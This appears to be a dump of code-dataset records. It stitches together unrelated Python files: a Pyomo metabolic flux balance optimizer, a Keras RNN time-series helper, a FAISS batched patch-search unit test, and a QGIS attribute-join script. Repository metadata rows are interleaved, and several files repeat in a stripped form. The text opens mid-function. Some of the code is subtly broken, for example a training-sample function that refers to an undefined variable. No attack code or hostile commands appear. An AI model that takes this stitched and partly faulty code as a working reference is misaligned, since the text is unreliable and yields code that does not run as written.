return sum(stoyMat.loc[metabid, rxnid]*model.fluxes[rxnid] for rxnid in stoyMat.columns) == 0
self.pyoModel.MBcstrs = Constraint(self.pyoModel.metabIDs, rule = mb_rule)
# end metabolites and metabolites in excluded_mb are not balanced
for metabid in self.pyoModel.metabIDs:
if metabid in self.model.end_metabolites or metabid in self.excluded_mb:
self.model.metabolites[metabid].is_constrained_by_mass_balance = False
self.pyoModel.MBcstrs[metabid].deactivate()
def solve(self):
self._build_flux_variables()
self._build_objective()
self._build_mass_balance_contraints()
solver = SolverFactory('glpk')
solver.solve(self.pyoModel)
optObj = value(self.pyoModel.obj)
optFluxes = {}
for rxnid in self.pyoModel.fluxes:
optFluxes[rxnid] = value(self.pyoModel.fluxes[rxnid])
return FBAResults(optObj, optFluxes)
class TFBAOptimizer(FBAOptimizer):
def __init__(self, model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
irr_reactions, excluded_concs, excluded_mb, excluded_thmd):
'''
Parameters
model: Model
model that calls FBAOptimizer
objective: dict
reaction ID => coefficient in the objective expression
direction: str
direction of optimization
flux_bounds: tuple
lower and upper bounds of metabolic flux
conc_bounds: tuple
lower and upper bounds of metabolite concentration
preset_fluxes: dict
rxnid => float, fixed metabolic fluxes
preset_concs: dict
metabid => float, fixed metabolite concentration
irr_reactions: list
irreversible reactions
excluded_concs: list
metabolite concentrations excluded from optimization
excluded_mb: list
metabolites excluded from mass balance constraints
excluded_thmd: list
metabolites excluded from thermodynamics constraints
'''
super().__init__(model, objective, direction, flux_bounds, preset_fluxes, irr_reactions, excluded_mb)
self.conc_bounds = conc_bounds
self.lnconc_bounds = tuple(np.log(self.conc_bounds))
self.preset_concs = preset_concs
self.excluded_thmd = [] if excluded_thmd is None else excluded_thmd
self.excluded_concs = [] if excluded_concs is None else excluded_concs
self.pyoModel.inMetabIDs = Set(initialize = [metabid for metabid in self.model.metabolites
if metabid.lower() != 'biomass' and
not self._is_exch_metab(metabid) and
not self._is_excluded_conc(metabid)]) # exclude biomass, exchange metabolites, and metabolites excluded from optimization
self.pyoModel.influxIDs = Set(initialize = [rxnid for rxnid, rxn in self.model.reactions.items()
if not rxn.is_biomass_formation and
not rxn.is_exchange]) # exclude biomass formation and exchange reactions
def _is_exch_metab(self, metabid):
return True if re.match(r'^[\w\._]+\.o$', metabid) else False
def _is_excluded_conc(self, metabid):
return re.sub(r'(.+)\..+$', '\g<1>', metabid).lower() in self.excluded_concs
def _build_conc_variables(self):
if self.preset_concs is None:
self.pyoModel.lnconcs = Var(self.pyoModel.inMetabIDs, bounds = self.lnconc_bounds)
else:
def conc_bounds_rule(model, metabid):
if metabid in self.preset_concs: # set the bounds of fixed concentrations
return (np.log(self.preset_concs[metabid]),)*2
else:
return self.lnconc_bounds
self.pyoModel.lnconcs = Var(self.pyoModel.inMetabIDs, bounds = conc_bounds_rule)
def _calculate_gibbs_energy(self, model, rxnid):
'''
Parameters
model: pyomo model
pyomo model
rxnid: str
reaction ID
'''
subs = self.model.reactions[rxnid].substrates
pros = self.model.reactions[rxnid].products
subsSum = sum([subs[subid].coe*model.lnconcs[subid] for subid in subs if not self._is_excluded_conc(subid)])
prosSum = sum([pros[proid].coe*model.lnconcs[proid] for proid in pros if not self._is_excluded_conc(proid)])
return self.model.reactions[rxnid].dgpm + (prosSum - subsSum)*R*T
def _build_thermodynamics_constraints(self):
def thmd_rule(model, rxnid):
return model.fluxes[rxnid]*self._calculate_gibbs_energy(model, rxnid) <= 0
self.pyoModel.THMDcstr = Constraint(self.pyoModel.influxIDs, rule = thmd_rule)
# reactions in excluded_thmd are excluded from thermodynamics constraints
for rxnid in self.pyoModel.influxIDs:
if rxnid in self.excluded_thmd:
self.model.reactions[rxnid].is_constrained_by_thermodynamics = False
self.pyoModel.THMDcstr[rxnid].deactivate()
def solve(self):
self._build_flux_variables()
self._build_conc_variables()
self._build_objective()
self._build_mass_balance_contraints()
self._build_thermodynamics_constraints()
solver = SolverFactory('ipopt')
solver.options['max_iter']= maxIter
solver.solve(self.pyoModel)
optObj = value(self.pyoModel.obj)
optFluxes = {}
for rxnid in self.pyoModel.fluxes:
optFluxes[rxnid] = value(self.pyoModel.fluxes[rxnid])
optLnconcs = {}
for metabid in self.pyoModel.lnconcs:
optLnconcs[metabid] = value(self.pyoModel.lnconcs[metabid])
optDgps = {}
for rxnid in self.pyoModel.THMDcstr:
optDgps[rxnid] = value(self._calculate_gibbs_energy(self.pyoModel, rxnid))
return TFBAResults(optObj, optFluxes, optLnconcs, optDgps)
class ETFBAOptimizer(TFBAOptimizer):
def __init__(self, model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
irr_reactions, excluded_concs, excluded_mb, excluded_thmd, included_epc, use_fba_results):
'''
Parameters
model: Model
model that calls FBAOptimizer
objective: dict
reaction ID => coefficient in the objective expression
direction: str
direction of optimization
flux_bounds: tuple
lower and upper bounds of metabolic flux
conc_bounds: tuple
lower and upper bounds of metabolite concentration
preset_fluxes: dict
rxnid => float, fixed metabolic fluxes
preset_concs: dict
metabid => float, fixed metabolite concentration
irr_reactions: list
irreversible reactions
excluded_concs: list
metabolite concentrations excluded from optimization
excluded_mb: list
metabolites excluded from mass balance constraints
excluded_thmd: list
reactions excluded from thermodynamics constraints
included_epc: list
reactions excluded from enzyme protein cost constraints
use_fba_results: bool
whether to use precomputed fluxes by FBA
'''
super().__init__(model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
irr_reactions, excluded_concs, excluded_mb, excluded_thmd)
self.included_epc = included_epc
self.use_fba_results = use_fba_results
@staticmethod
def _get_real(value, default):
return value if value is not np.nan else default
def _calculate_enzyme_cost(self, model, rxnids):
'''
Parameters
model: pyomo model
pyomo model
rxnids: list
reaction IDs
'''
costs = []
for rxnid in rxnids:
v = model.fluxes[rxnid]
fkcat = self._get_real(self.model.reactions[rxnid].fkcat, defaultKcat)
mw = self._get_real(self.model.reactions[rxnid].mw, defaultMW)
dgpm = self.model.reactions[rxnid].dgpm
subs = self.model.reactions[rxnid].substrates
pros = self.model.reactions[rxnid].products
subsKmSum = sum([subs[subid].coe*log(self._get_real(self.model.metabolites[subid].kms[rxnid], defaultKm))
for subid in subs if not self._is_excluded_conc(subid)])
prosKmSum = sum([pros[proid].coe*log(self._get_real(self.model.metabolites[proid].kms[rxnid], defaultKm))
for proid in pros if not self._is_excluded_conc(proid)])
subsConcSum = sum([subs[subid].coe*model.lnconcs[subid] for subid in subs if not self._is_excluded_conc(subid)])
prosConcSum = sum([pros[proid].coe*model.lnconcs[proid] for proid in pros if not self._is_excluded_conc(proid)])
#e = v/fkcat*(1 + exp(subsKmSum - subsConcSum))/(1 - exp(prosConcSum - subsConcSum + dgpm/R/T))
e = v/fkcat*(exp(subsConcSum - subsKmSum) + exp(prosConcSum - prosKmSum) + 1)/(exp(subsConcSum - subsKmSum)*(1 - exp(prosConcSum - subsConcSum + dgpm/R/T)))
costs.append(1/3600*mw*e)
return costs
def _build_flux_parameters(self):
fbaFluxes = FBAOptimizer(self.model, self.objective, self.direction, self.flux_bounds, self.preset_fluxes,
self.irr_reactions, self.excluded_mb).solve().opt_fluxes
self.pyoModel.fluxes = Param(self.pyoModel.fluxIDs, initialize = fbaFluxes)
def _build_objective_without_fluxes(self):
for rxnid in self.included_epc:
if self.model.reactions[rxnid].is_biomass_formation:
raise ValueError("biomass formation can't be included in enzyme protein cost")
if self.model.reactions[rxnid].is_exchange:
raise ValueError("exchange reaction %s can't be included in enzyme protein cost" % rxnid)
def obj_rule(model):
return sum(self._calculate_enzyme_cost(model, self.included_epc))
self.pyoModel.obj = Objective(rule = obj_rule, sense = minimize) # always minimize the objective
def _build_objective_with_fluxes(self):
for k in self.objective:
if k not in self.model.reactions:
raise KeyError('use valid reaction IDs in objective')
for rxnid in self.included_epc:
if self.model.reactions[rxnid].is_biomass_formation:
raise ValueError("biomass formation can't be included in enzyme protein cost")
if self.model.reactions[rxnid].is_exchange:
raise ValueError("exchange reaction %s can't be included in enzyme protein cost" % rxnid)
def obj_rule(model):
flux_obj = sum(coe*model.fluxes[rxnid] for rxnid, coe in self.objective.items())
epc_obj = sum(self._calculate_enzyme_cost(model, self.included_epc))
return epc_obj/flux_obj
self.pyoModel.obj = Objective(rule = obj_rule, sense = minimize) # always minimize the objective
def _build_thermodynamics_constraints_without_fluxes(self):
def thmd_rule(model, rxnid):
if model.fluxes[rxnid] >= 0:
return self._calculate_gibbs_energy(model, rxnid) <= 0
else:
return self._calculate_gibbs_energy(model, rxnid) >= 0
self.pyoModel.THMDcstr = Constraint(self.pyoModel.influxIDs, rule = thmd_rule)
# reactions in excluded_thmd are excluded from thermodynamics constraints
for rxnid in self.pyoModel.influxIDs:
if rxnid in self.excluded_thmd:
self.model.reactions[rxnid].is_constrained_by_thermodynamics = False
self.pyoModel.THMDcstr[rxnid].deactivate()
def solve(self):
if self.use_fba_results:
self._build_flux_parameters()
self._build_conc_variables()
self._build_objective_without_fluxes()
self._build_thermodynamics_constraints_without_fluxes()
else:
self._build_flux_variables()
self._build_conc_variables()
self._build_objective_with_fluxes()
self._build_mass_balance_contraints()
self._build_thermodynamics_constraints()
solver = SolverFactory('ipopt')
solver.options['max_iter']= maxIter
res = solver.solve(self.pyoModel)
optObj = value(sum(coe*self.pyoModel.fluxes[rxnid] for rxnid, coe in self.objective.items()))
optFluxes = {}
for rxnid in self.pyoModel.fluxes:
optFluxes[rxnid] = value(self.pyoModel.fluxes[rxnid])
optLnconcs = {}
for metabid in self.pyoModel.lnconcs:
optLnconcs[metabid] = value(self.pyoModel.lnconcs[metabid])
optDgps = {}
for rxnid in self.pyoModel.THMDcstr:
optDgps[rxnid] = value(self._calculate_gibbs_energy(self.pyoModel, rxnid))
ecosts = self._calculate_enzyme_cost(self.pyoModel, self.included_epc)
optTotalEcost = value(sum(ecosts))
optEcosts = {}
for rxnid, cost in zip(self.included_epc, ecosts):
optEcosts[rxnid] = value(cost)
return ETFBAResults(optObj, optFluxes, optLnconcs, optDgps, optTotalEcost, optEcosts)
| 7,583 | 7,052 | 69 |
c5d6bf89e462376e078860e14efcafac35041ceb | 7,921 | py | Python | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
# convert an array of values into a dataset matrix
| 38.451456 | 89 | 0.562681 | import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
def construct_rnn_model(look_back,
d,
n_units=[20, 20],#[500, 500],
dense_units=[50, 10],#[1000, 200, 50, 10],
filters=64,
kernel_size=5,
pool_size=4,
method='sgru',
bias_reg=None,
input_reg=None,
recurr_reg=None):
model = Sequential()
if method == 'lstm':
model.add(LSTM(n_units[0],
input_shape=(look_back, d),
return_sequences=True,
bias_regularizer=bias_reg,
kernel_regularizer=input_reg,
recurrent_regularizer=recurr_reg))
for n_unit in n_units[1:]:
model.add(LSTM(n_unit,
bias_regularizer=bias_reg,
kernel_regularizer=input_reg,
recurrent_regularizer=recurr_reg))
elif method == 'gru':
model.add(GRU(n_units[0],
input_shape=(look_back, d),
return_sequences=True,
bias_regularizer=bias_reg,
kernel_regularizer=input_reg,
recurrent_regularizer=recurr_reg))
for n_unit in n_units[1:]:
model.add(GRU(n_unit,
bias_regularizer=bias_reg,
kernel_regularizer=input_reg,
recurrent_regularizer=recurr_reg))
elif method == 'bi-lstm':
model.add(Bidirectional(LSTM(n_units[0],
input_shape=(look_back, d),
return_sequences=True)))
for n_unit in n_units[1:]:
model.add(Bidirectional(LSTM(n_unit)))
elif method == 'bi-gru':
model.add(Bidirectional(GRU(n_units[0],
input_shape=(look_back, d),
return_sequences=True)))
for n_unit in n_units[1:]:
model.add(Bidirectional(GRU(n_unit)))
elif method == 'lstm-cnn':
model.add(Conv1D(filters,
kernel_size,
input_shape=(look_back, d),
padding='valid',
activation='relu',
strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(LSTM(n_units[0],
return_sequences=True))
for n_unit in n_units[1:]:
model.add(LSTM(n_unit))
elif method == 'gru-cnn':
model.add(Conv1D(filters,
kernel_size,
input_shape=(look_back, d),
padding='valid',
activation='relu',
strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(GRU(n_units[0],
return_sequences=True))
for n_unit in n_units[1:]:
model.add(GRU(n_unit))
elif method == 'bi-lstm-cnn':
model.add(Conv1D(filters,
kernel_size,
input_shape=(look_back, d),
padding='valid',
activation='relu',
strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(Bidirectional(LSTM(n_units[0],
return_sequences=True)))
for n_unit in n_units[1:]:
model.add(LSTM(n_unit))
elif method == 'bi-gru-cnn':
model.add(Conv1D(filters,
kernel_size,
input_shape=(look_back, d),
padding='valid',
activation='relu',
strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(Bidirectional(GRU(n_units[0],
return_sequences=True)))
for n_unit in n_units[1:]:
model.add(GRU(n_unit))
for dense_n_unit in dense_units:
model.add(Dense(dense_n_unit, activation='relu'))
model.add(Dense(d))
if 'plstm' in method:
adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
model.compile(loss='mean_squared_error', optimizer=adam)
else:
model.compile(loss='mean_squared_error', optimizer='adam')
return model
# convert an array of values into a dataset matrix
def create_training_samples(graphs, look_back=5, d=2):
T = len(graphs)
train_size = T - look_back
trainX = np.zeros((train_size, look_back, d))
trainY = np.zeros((train_size, d))
n_samples_train = 0
for t in range(T - look_back):
for tau in range(look_back):
trainX[n_samples_train, tau, :] = ts_train.iloc[t + tau, :]
trainY[n_samples_train, :] = ts_train.iloc[t + look_back, :]
n_samples_train += 1
return trainX, trainY
def learn_rnn_parameters(ts, ts_exogs, options, look_ahead=1,
train_start_date=None,
train_end_date=None, test_start_date=None,
save_plots=False, method='gru'):
if train_start_date is None:
if ts_exogs is None:
train_start_date = ts.index.min()
else:
train_start_date = max(ts.index.min(), ts_exogs.index.min())
if train_end_date is None:
train_end_date = max(ts.index)
test_end_date = options.warn_start_date + pd.Timedelta(days=look_ahead - 1)
gap_dates = pd.date_range(train_end_date + pd.Timedelta(days=1),
test_start_date, closed="left")
test_dates = pd.date_range(test_start_date, test_end_date)
gap_and_test_dates = gap_dates.append(test_dates)
ts_train = ts[train_start_date: train_end_date]
if ts_exogs is not None:
ts_exogs_train = ts_exogs[train_start_date: train_end_date]
ts_exogs_gap_test = ts_exogs[
min(gap_and_test_dates):max(gap_and_test_dates)]
else:
ts_exogs_train = None
ts_exogs_gap_test = None
if ts_exogs_train is not None:
ts_concat = pd.concat([ts_train, ts_exogs_train], axis=1)
else:
ts_concat = pd.DataFrame(ts_train)
ts_concat = ts_concat.dropna(axis=0)
look_back = 5
d = len(ts_concat.columns)
model = construct_rnn_model(look_back=look_back, d=d, method=method)
early_stop = EarlyStopping(monitor='val_loss', patience=10, verbose=1)
trainX, trainY = create_training_samples(
ts_concat,
look_back=look_back,
d=d
)
t1 = time()
model.fit(trainX,
trainY,
nb_epoch=2000,
batch_size=100,
validation_split=0.2,
callbacks=[early_stop],
verbose=2)
t2 = time()
print('Training time: %fsec' % (t2 - t1))
forecast_length = len(gap_dates) + len(test_dates)
predictions = []
for pred_day in range(forecast_length):
testX = np.array(ts_concat[-look_back:]).reshape((1, look_back, d))
prediction = model.predict(testX, batch_size=100, verbose=0)
ts_concat = ts_concat.append(pd.DataFrame(prediction, columns=ts_concat.columns))
predictions.append(prediction[0])
print('Test time: %fsec' % (time() - t2))
list_pred = np.array(predictions)[-len(test_dates):, 0]
print("Last", look_ahead, "predictions:")
print(list_pred)
ts_pred = pd.Series(list_pred, index=test_dates + pd.Timedelta(hours=12))
ts_pred[ts_pred < 0] = 0
ts_pred.name = 'count'
ts_pred.index.name = 'date'
return ts_pred | 7,493 | 0 | 68 |
44e4fc582229cc7f1dc265d8119e7fa52c25f0cd | 8,199 | py | Python | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
#
# -- Load Data --
#
#
# -- [Exec] Sim Search --
#
| 30.479554 | 92 | 0.56702 |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
def save_image(burst,prefix="prefix"):
root = PYTEST_OUTPUT
if not(root.exists()): root.mkdir()
burst = rearrange(burst,'t c h w -> t h w c')
burst = np.clip(burst,0,255)
burst = burst.astype(np.uint8)
nframes = burst.shape[0]
for t in range(nframes):
fn = "%s_kn3_io_%02d.png" % (prefix,t)
img = Image.fromarray(burst[t])
path = str(root / fn)
img.save(path)
def get_empty_bufs(K,args,shape,device):
ps,pt = args.ps,args.pt
stride = args.queryStride
t,c,h,w = shape
return init_empty_bufs(K,stride,ps,pt,t,c,h,w,device)
def init_empty_bufs(k,stride,ps,pt,t,c,h,w,device):
nq = (t*h*w)//stride+1
cshape = (nq,k)
pshape = (nq,k,pt,c,ps,ps)
tf32,ti32 = th.float32,th.int32
bufs = edict()
bufs.patches = th.zeros(pshape,device=device,dtype=tf32)
bufs.dists = th.zeros(cshape,device=device,dtype=tf32)
bufs.inds = th.zeros(cshape,device=device,dtype=ti32)
return bufs
class TestBatchingTopKPatches(unittest.TestCase):
#
# -- Load Data --
#
def do_load_data(self,dname,sigma,device="cuda:0"):
# -- Read Data (Image & VNLB-C++ Results) --
clean = testing.load_dataset(dname).to(device)[:5]
clean = th.zeros((15,3,32,32)).to(device).type(th.float32)
clean = clean * 1.0
noisy = clean + sigma * th.normal(0,1,size=clean.shape,device=device)
return clean,noisy
def do_load_flow(self,comp_flow,burst,sigma,device):
if comp_flow:
# -- TV-L1 Optical Flow --
flow_params = {"nproc":0,"tau":0.25,"lambda":0.2,"theta":0.3,
"nscales":100,"fscale":1,"zfactor":0.5,"nwarps":5,
"epsilon":0.01,"verbose":False,"testing":False,'bw':True}
fflow,bflow = vnlb.swig.runPyFlow(burst,sigma,flow_params)
else:
# -- Empty shells --
t,c,h,w = burst.shape
tf32,tfl = th.float32,th.long
fflow = th.zeros(t,2,h,w,dtype=tf32,device=device)
bflow = fflow.clone()
# -- pack --
flows = edict()
flows.fflow = fflow
flows.bflow = bflow
return flows
def get_search_inds(self,index,bsize,stride,shape,device):
t,c,h,w = shape
start = index * bsize
stop = ( index + 1 ) * bsize
ti32 = th.int32
srch_inds = th.arange(start,stop,stride,dtype=ti32,device=device)[:,None]
srch_inds = kn3.get_3d_inds(srch_inds,h,w)
srch_inds = srch_inds.contiguous()
return srch_inds
def init_topk_shells(self,bsize,k,pt,c,ps,device):
tf32,ti32 = th.float32,th.int32
vals = float("inf") * th.ones((bsize,k),dtype=tf32,device=device)
inds = -th.ones((bsize,k),dtype=ti32,device=device)
patches = -th.ones((bsize,k,pt,c,ps,ps),dtype=tf32,device=device)
return vals,inds,patches
def exec_kn3_search_exh(self,K,clean,flows,sigma,args,bufs,pfill):
# -- unpack --
device = clean.device
shape = clean.shape
t,c,h,w = shape
# -- prepare kn3 search --
index,npix = 0,t*h*w
args.k = K
numQueryTotal = (npix-1)//args.queryStride+1
# -- search --
kn3.run_search(clean,0,numQueryTotal,flows,sigma,args,bufs,pfill=pfill)
th.cuda.synchronize()
# -- unpack --
kn3_dists = bufs.dists
kn3_inds = bufs.inds
kn3_patches = bufs.patches
return kn3_dists,kn3_patches
def exec_kn3_search_bch(self,K,clean,flows,sigma,args,bufs,pfill):
# -- unpack --
device = clean.device
shape = clean.shape
t,c,h,w = shape
# -- prepare kn3 search --
index,npix = 0,t*h*w
args.k = K
bsize = 1000
numQueryTotal = (npix-1)//args.queryStride+1
nbatches = (numQueryTotal-1)//bsize + 1
def view_buffer(bufs,batch,bsize):
# -- get slice --
start = batch * bsize
end = (batch+1) * bsize
bslice = slice(start,end)
# -- apply slice --
view_bufs = edict()
for key,val in bufs.items():
view_bufs[key] = val[bslice]
return view_bufs
# -- iterate over batches --
for batch in range(nbatches):
# -- view buffer --
view_bufs = view_buffer(bufs,batch,bsize)
# -- search --
qstart = bsize*batch
bsize_b = min(bsize,numQueryTotal - qstart)
# print(view_bufs.dists.shape,bsize_b,qstart,numQueryTotal,batch,nbatches,bsize)
assert bsize_b > 0,"strictly positive batch size."
kn3.run_search(clean,qstart,bsize_b,flows,sigma,
args,view_bufs,pfill=pfill)
th.cuda.synchronize()
kn3_dists = bufs.dists
kn3_patches = bufs.patches
return kn3_dists,kn3_patches
#
# -- [Exec] Sim Search --
#
def run_comparison(self,noisy,clean,sigma,flows,args,pfill):
# -- fixed testing params --
K = 15
BSIZE = 50
NBATCHES = 3
shape = noisy.shape
device = noisy.device
t,c,h,w = shape
npix = h*w
bstride = 1
# -- create empty bufs --
exh_bufs = edict()
exh_bufs.patches = None
exh_bufs.dists = None
exh_bufs.inds = None
# -- setup args --
args['stype'] = "faiss"
args['vpss_mode'] = "exh"
args['queryStride'] = 7
args['bstride'] = args['queryStride']
# args['vpss_mode'] = "vnlb"
# -- empty bufs --
bch_bufs = get_empty_bufs(K,args,shape,device)
# -- exec over batches --
for index in range(NBATCHES):
# -- get data --
clean = 255.*th.rand_like(clean).type(th.float32)
# clean /= 255.
# clean *= 255.
noisy = clean.clone()
# -- search using batching --
bch_dists,bch_patches = self.exec_kn3_search_bch(K,clean,flows,sigma,
args,bch_bufs,pfill)
# -- search using exh search --
exh_dists,exh_patches = self.exec_kn3_search_exh(K,clean,flows,sigma,
args,exh_bufs,pfill)
# -- to numpy --
bch_dists = bch_dists.cpu().numpy()
exh_dists = exh_dists.cpu().numpy()
bch_patches = bch_patches.cpu().numpy()
exh_patches = exh_patches.cpu().numpy()
# -- allow for swapping of "close" values --
np.testing.assert_array_equal(exh_dists,bch_dists)
if pfill:
np.testing.assert_array_equal(exh_patches,bch_patches)
def run_single_test(self,dname,sigma,comp_flow,pyargs):
noisy,clean = self.do_load_data(dname,sigma)
flows = self.do_load_flow(False,clean,sigma,noisy.device)
# -- fill patches --
self.run_comparison(noisy,clean,sigma,flows,pyargs,True)
# -- fill dists only --
self.run_comparison(noisy,clean,sigma,flows,pyargs,False)
def test_batch_sim_search(self):
# -- init save path --
np.random.seed(123)
save_dir = SAVE_DIR
if not save_dir.exists():
save_dir.mkdir(parents=True)
# -- test 1 --
sigma = 25.
dname = "text_tourbus_64"
comp_flow = False
args = edict({'ps':7,'pt':1,'c':3})
self.run_single_test(dname,sigma,comp_flow,args)
| 7,191 | 28 | 335 |
052cd3f78110394dd7657e73f8d3f7bab57102d4 | 1,878 | py | Python | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | spatialthoughts/qgis-tutorials | dc1c6027de72e4875d8d5428fbc1f453b51e0468 | [
"CC-BY-4.0"
] | 34 | 2015-05-11T14:54:47.000Z | 2022-02-11T06:16:48.000Z | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | Santhosh-M31/qgis-tutorials | d22c534219689cff663b9b91b7d6e0e658f83b0d | [
"CC-BY-4.0"
] | 16 | 2016-04-20T10:52:10.000Z | 2022-01-08T13:57:11.000Z | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | Santhosh-M31/qgis-tutorials | d22c534219689cff663b9b91b7d6e0e658f83b0d | [
"CC-BY-4.0"
] | 34 | 2015-07-23T11:13:22.000Z | 2021-12-19T05:50:11.000Z | from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| 28.029851 | 87 | 0.764643 | from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| 0 | 0 | 0 |
